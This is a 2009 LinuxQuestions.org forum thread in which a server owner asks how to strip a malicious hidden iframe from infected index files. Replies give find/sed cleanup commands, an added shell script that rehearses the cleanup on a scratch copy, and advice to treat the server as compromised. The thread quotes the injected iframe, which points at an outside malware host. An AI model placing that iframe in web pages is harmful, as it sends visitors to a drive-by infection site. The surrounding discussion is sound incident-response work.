LinuxQuestions.org
Old 07-14-2009, 08:44 AM   #1
Farman
LQ Newbie
 
A virus changed all my index files with iframe, how to remove that iframe line?


Hi there,

I've a dedicated server and don't know too much about Linux, but trying to manage it by learning slowly by looking at the tutorials etc.

I've several sites at my server, Today when I open my site I got an error message:
Code:
Parse error: syntax error, unexpected $end in /home/stuffloa/public_html/index.php on line 585
When I open the index.php file, I got this at line 585:
Code:
<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>
Now I want to remove this code from the entire server; it's infecting the pages which have <body> or are named index.php, index.html, etc.

Now it's impossible for me to check every file one by one and remove this line manually. Is there any solution for removing this line at once?

And how can I prevent this from happening again?



Regards,
 
Old 07-14-2009, 08:52 AM   #2
colucix
Moderator
 
You can use find to look for files based on their name and pass the filename to a sed command through xargs. For example
Code:
find /source/path -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
Substitute /source/path with the path of the directory from which you want to begin the search and the trick is done. Note that -print0 and -0 are options to manage file names with spaces, but most likely they are not needed in this case.
 
Old 07-14-2009, 09:16 AM   #3
unSpawn
Moderator
 
...also note you can use another separator (pipe symbol?) to avoid having to escape chars in use. Prevention partially depends on the security posture of the machine: exposing services to the world that should not be, misconfiguring software, running stale, vulnerable software versions and anything that basically is crappily coded doesn't help.
 
Old 07-14-2009, 09:19 AM   #4
tredegar
LQ 5k Club
 
If somebody is changing your code, it means your machine is compromised.

Editing bad code out of your php files is not going to help you. They'll just change it back.

You need to take the machine offline NOW (as it is probably sending spam, or worse) and raise this in the security forum of LQ where better people than I can give you the help you need to find out how they got past your security, and how to reinstall and harden your system.

I've asked for this thread to be moved.
 
Old 07-14-2009, 09:56 AM   #5
Farman
LQ Newbie
 
Quote:
Originally Posted by colucix
You can use find to look for files based on their name and pass the filename to a sed command through xargs. For example
Code:
find /source/path -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
Substitute /source/path with the path of the directory from which you want to begin the search and the trick is done. Note that -print0 and -0 are options to manage file names with spaces, but most likely they are not needed in this case.
Thanks all of you,

When I try to run this command as a root in ssh,
Code:
find /home/stuffloa -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
I get nothing. "stuffloa" is my site, which is in /home.

Where can be the problem?

Quote:
Originally Posted by tredegar
If somebody is changing your code, it means your machine is compromised.

Editing bad code out of your php files is not going to help you. They'll just change it back.

You need to take the machine offline NOW (as it is probably sending spam, or worse) and raise this in the security forum of LQ where better people than I can give you the help you need to find out how they got past your security, and how to reinstall and harden your system.

I've asked for this thread to be moved.
About 8 hours ago my server was attacked. I removed the line from several files at that time, and till now it is OK, I mean it's not been changed back to the infected version. So I will tighten the security later, but for now I should clean all the infected files.

So which command should I use to remove the entire line from all of the files?

If more information needed about my server or paths, I can provide.


Thank you

Last edited by Farman; 07-14-2009 at 10:01 AM.
 
Old 07-14-2009, 10:22 AM   #6
unSpawn
Moderator
 
Quote:
Originally Posted by Farman
When I try to run this command as a root in ssh
Does that mean you logged in over SSH as root account user?


Quote:
Originally Posted by Farman
About 8 hours ago my server was attacked. I removed the line from several files at that time, and till now it is OK, I mean it's not been changed back to the infected version. So I will tighten the security later, but for now I should clean all the infected files.
No, it's not a choice you make. You have to (and can) do both simultaneously.
 
Old 07-14-2009, 10:40 AM   #7
colucix
Moderator
 
Quote:
Originally Posted by Farman
Code:
find /home/stuffloa -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
I get nothing. "stuffloa" is my site, which is in /home.

Where can be the problem?
Apart from the security concerns that I leave to unSpawn and other members more expert than me... what do you mean by "I get nothing"? That command should not give any standard output; it just removes the line from the index* files. Note the -i option of the sed command: it means "edit the file in place".

Before actually running a command suggested by someone, do some tests: copy one of the files containing that line into a dummy directory and test the command to see if it works. Once you've verified that it is free from bugs/errors and it does what you expect, you can safely run it on the true files.
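As an added example (not code from the thread or from any of its posters) that puts together colucix's find/sed cleanup from post #2, unSpawn's tip in post #3 about using another delimiter, and colucix's advice in post #7 to rehearse on a copy first: the fake web root, its file contents and the MARKER string are constructed for the demo, and GNU find and GNU sed (for -exec ... {} + and sed -i) are assumed.

```shell
#!/bin/sh
# Added example, not code from the thread: remove the injected iframe line
# that Farman found, but rehearse on a scratch copy first (colucix, post #7).
# The web root, the file contents and the scratch directory are constructed
# here; GNU sed -i and GNU find are assumed.
set -u

# The injected line is identified by this fixed substring (from post #1).
MARKER='a5j.ru:8080/ts/in.cgi?pepsi100'

# Populate "$1" with a fake web root: one infected index.php (inside a
# directory whose name contains a space) and one clean index.html.
make_sample() {
    mkdir -p "$1/site a"
    printf '<?php\necho "hello";\n<iframe src="http://%s" width=125 height=125 style="visibility: hidden"></iframe>\n' "$MARKER" > "$1/site a/index.php"
    printf '<html><body>clean</body></html>\n' > "$1/index.html"
}

# Print how many files under "$1" still carry the marker (0 means clean).
count_infected() {
    grep -rlF -- "$MARKER" "$1" | wc -l | tr -d ' '
}

# Delete every line matching the marker from index* files under "$1".
# -exec ... {} + hands many files to each sed call and copes with spaces in
# names, like colucix's -print0 | xargs -0, and runs nothing when no file
# matches. The sed address uses | as its delimiter (unSpawn's tip), so the
# slashes in the URL need no escaping; only the dots are escaped, because an
# unescaped . would match any character. ? is literal in a basic regex.
clean_tree() {
    find "$1" -name 'index*' -type f -exec sed -i '\|a5j\.ru:8080/ts/in\.cgi?pepsi100|d' {} +
}

# Rehearsal on a throwaway copy: build it, clean it, compare before/after.
scratch=$(mktemp -d)
make_sample "$scratch"
echo "infected before: $(count_infected "$scratch")"   # 1
clean_tree "$scratch"
echo "infected after:  $(count_infected "$scratch")"   # 0
rm -rf "$scratch"
```

Once the rehearsal reports 0 and the cleaned copy still looks right, the same clean_tree call can be pointed at the real document root, and count_infected is the check to run afterwards to confirm nothing was missed.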
 
Old 07-14-2009, 11:18 AM   #8
Farman
LQ Newbie
 
Quote:
Originally Posted by colucix
Apart from the security concerns that I leave to unSpawn and other members more expert than me... what do you mean by "I get nothing"? That command should not give any standard output; it just removes the line from the index* files. Note the -i option of the sed command: it means "edit the file in place".

Before actually running a command suggested by someone, do some tests: copy one of the files containing that line into a dummy directory and test the command to see if it works. Once you've verified that it is free from bugs/errors and it does what you expect, you can safely run it on the true files.
Thanks all once again for your kindness.

Oh, I'm so sorry colucix, I checked it and it worked perfectly.

Now the question is: how can we prevent this type of attack?
 
Old 07-14-2009, 11:38 AM   #9
unSpawn
Moderator
 
It would be advisable for the OP to read this thread's posts a little bit better.

Last edited by unSpawn; 07-14-2009 at 03:33 PM. Reason: //better
 
Old 07-16-2009, 09:04 AM   #10
r0b0
Member
 
Farman - STOP doing what you are doing RIGHT NOW.

Your machine is now operated by someone else, not you. You should stop worrying about some string replacement scripts. You need to REINSTALL your server from trusted sources (CD burned on another machine) and set it up securely BEFORE RUNNING INTERNET SERVICES ON IT.

Robert
 
Old 07-16-2009, 09:40 AM   #11
unSpawn
Moderator
 
Quote:
Originally Posted by r0b0
Farman - STOP doing what you are doing RIGHT NOW.
Nice. Usually it's me saying that sort of thing and phrasing it like that. However...


Quote:
Originally Posted by r0b0
Your machine is now operated by someone else, not you. You should stop worrying about some string replacement scripts. You need to REINSTALL your server from trusted sources (CD burned on another machine) and set it up securely BEFORE RUNNING INTERNET SERVICES ON IT.
Could it be you're mistaking a compromise of the root account for malarkey on the service level? (Not that that is innocent if left as is.) In the Linux Security forum we deal with facts, so if you think a compromise of the root account has happened, wouldn't it be appropriate to ask the OP to collect data that supports your idea before telling him to wipe his machine? And even if there was a root account compromise, wouldn't he be heading for the same situation if he didn't know the intrusion vector?
 
  

